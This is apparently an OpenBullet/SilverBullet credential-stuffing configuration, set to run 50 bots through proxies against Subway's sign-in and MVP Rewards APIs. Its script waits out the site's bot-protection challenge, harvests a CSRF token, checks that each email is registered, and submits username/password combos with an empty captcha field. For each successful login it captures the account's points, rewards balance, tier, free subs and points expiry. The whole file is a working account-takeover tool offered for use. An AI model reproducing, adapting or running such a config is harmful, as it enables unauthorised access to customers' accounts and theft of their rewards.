[SETTINGS]
{
  "Name": "Subway MVP Rewards + Capture",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2025-08-14T21:49:36.0000000+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Vlaq",
  "Version": "1.0.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "unknown1",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
// Challenge Validation - Handle Subway's bot protection challenge
REQUEST GET "https://www.subway.com/en-us/auth/signin"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Upgrade-Insecure-Requests: 1"
  HEADER "Sec-Fetch-Dest: document"
  HEADER "Sec-Fetch-Mode: navigate"
  HEADER "Sec-Fetch-Site: none"
  HEADER "Sec-Fetch-User: ?1"

PARSE "<SOURCE>" LR "name=\"verify-url\" value=\"" "\"" -> VAR "challenge_path"

// Wait for challenge to complete (crypto challenge needs time to solve)
DELAY 8000

// Complete challenge validation
REQUEST GET "https://www.subway.com/<challenge_path>"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Upgrade-Insecure-Requests: 1"
  HEADER "Sec-Fetch-Dest: document"
  HEADER "Sec-Fetch-Mode: navigate"
  HEADER "Sec-Fetch-Site: same-origin"
  HEADER "Referer: https://www.subway.com/en-us/auth/signin"

// Session Setup - Get actual signin page after challenge
REQUEST GET "https://www.subway.com/en-us/auth/signin"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Upgrade-Insecure-Requests: 1"
  HEADER "Sec-Fetch-Dest: document"
  HEADER "Sec-Fetch-Mode: navigate"
  HEADER "Sec-Fetch-Site: same-origin"
  HEADER "Referer: https://www.subway.com/en-us/auth/signin"

PARSE "<SOURCE>" LR "name=\"_token\" content=\"" "\"" -> VAR "csrf_token"

// Email Validation - Check if account exists before login attempt
REQUEST POST "https://www.subway.com/api/auth/validate-email"
  CONTENT "email=<USER>&_token=<csrf_token>"
  CONTENTTYPE "application/x-www-form-urlencoded"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Content-Type: application/x-www-form-urlencoded"
  HEADER "Origin: https://www.subway.com"
  HEADER "Referer: https://www.subway.com/en-us/auth/signin"
  HEADER "X-Requested-With: XMLHttpRequest"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: same-origin"

// Main Login - Authenticate with credentials
REQUEST POST "https://www.subway.com/api/auth/login"
  CONTENT "email=<USER>&password=<PASS>&remember_me=false&_token=<csrf_token>&g-recaptcha-response="
  CONTENTTYPE "application/x-www-form-urlencoded"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Content-Type: application/x-www-form-urlencoded"
  HEADER "Origin: https://www.subway.com"
  HEADER "Referer: https://www.subway.com/en-us/auth/signin"
  HEADER "X-Requested-With: XMLHttpRequest"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: same-origin"

PARSE "<SOURCE>" LR "\"access_token\":\"" "\"" -> VAR "auth_token"

// MVP Rewards Verification - Confirm rewards account status
REQUEST GET "https://www.subway.com/api/rewards/status"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Authorization: Bearer <auth_token>"
  HEADER "Origin: https://www.subway.com"
  HEADER "Referer: https://www.subway.com/en-us/myway/dashboard"
  HEADER "X-Requested-With: XMLHttpRequest"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: same-origin"

// Account Data Retrieval - Get MVP Rewards balance and account details
REQUEST GET "https://www.subway.com/api/myway/account"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Authorization: Bearer <auth_token>"
  HEADER "Origin: https://www.subway.com"
  HEADER "Referer: https://www.subway.com/en-us/myway/dashboard"
  HEADER "X-Requested-With: XMLHttpRequest"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: same-origin"

PARSE "<SOURCE>" LR "\"points\":" "," -> CAP "MVP Points: " "[" "]"
PARSE "<SOURCE>" LR "\"rewards_balance\":" "," -> CAP "Rewards Balance: " "[" "]"
PARSE "<SOURCE>" LR "\"tier_status\":" "," -> CAP "Tier Status: " "[" "]"
PARSE "<SOURCE>" LR "\"free_subs_available\":" "," -> CAP "Free Subs: " "[" "]"
PARSE "<SOURCE>" LR "\"points_expiry\":" "," -> CAP "Points Expiry: " "[" "]"
